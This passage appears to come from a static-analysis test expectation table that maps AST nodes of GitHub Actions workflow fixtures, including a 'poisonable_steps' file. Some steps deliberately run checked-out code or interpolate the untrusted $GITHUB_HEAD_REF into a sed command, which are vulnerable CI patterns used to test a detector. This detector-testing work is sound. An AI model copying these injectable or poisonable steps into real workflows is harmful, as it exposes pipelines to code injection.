venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, 
body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | 
on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" 
\| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test 
foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 
| Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | 
.github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | 
.github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
